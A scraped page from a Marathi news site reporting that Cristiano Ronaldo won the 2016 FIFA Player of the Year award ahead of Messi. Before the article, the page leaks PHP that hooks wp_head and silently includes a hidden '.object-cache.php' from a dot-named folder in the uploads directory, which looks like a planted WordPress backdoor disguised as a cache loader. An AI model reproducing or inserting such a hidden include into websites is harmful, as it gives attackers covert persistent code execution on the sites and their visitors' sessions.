add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); फुटबॉलपटू रोनाल्डोला फिफा प्लेअर ऑफ इयर पुरस्कार – SOCH INDIA
Menu

खेल
फुटबॉलपटू रोनाल्डोला फिफा प्लेअर ऑफ इयर पुरस्कार

nobanner

सुप्रसिद्ध फुलबॉल पटू ख्रिस्तियानो रोनाल्डोला यंदा पुन्हा एकदा फिफा प्लेअर ऑफ इयरचा पुरस्कार देण्यात आलाय. रोनाल्डोनं त्याचा प्रतिस्पर्धी लिओनन मेसीला मागे टाकत या पुरस्कारावर आपलं नाव कोरलं. 31 वर्षीय रोनाल्डोला याआधीही तीन वेळा या पुरस्कारानं गौरवण्यात आलं आहे.

रोनाल्डोनं यंदाच्या चॅम्पियन्स लीग त्याचा क्लब रियाल मद्रिदसाठी आणि युरो 2016मध्ये पोर्तुगालसाठी खेळताना त्याच्या प्रतिष्ठेला साजेसा खेळ करून फुटबॉल प्रेमींची मनं जिंकली होती. पुरस्कार जाहीर झाल्यावर 2016 हे आपल्यासाठी एक ड्रीम इयर होतं अशी प्रतिक्रिया रोनाल्डोनं व्यक्त केली. प्लेअर ऑफ द ईयरचा पुरस्कार मिळेल अशी खात्री होती असंही रोनाल्डो म्हणाला.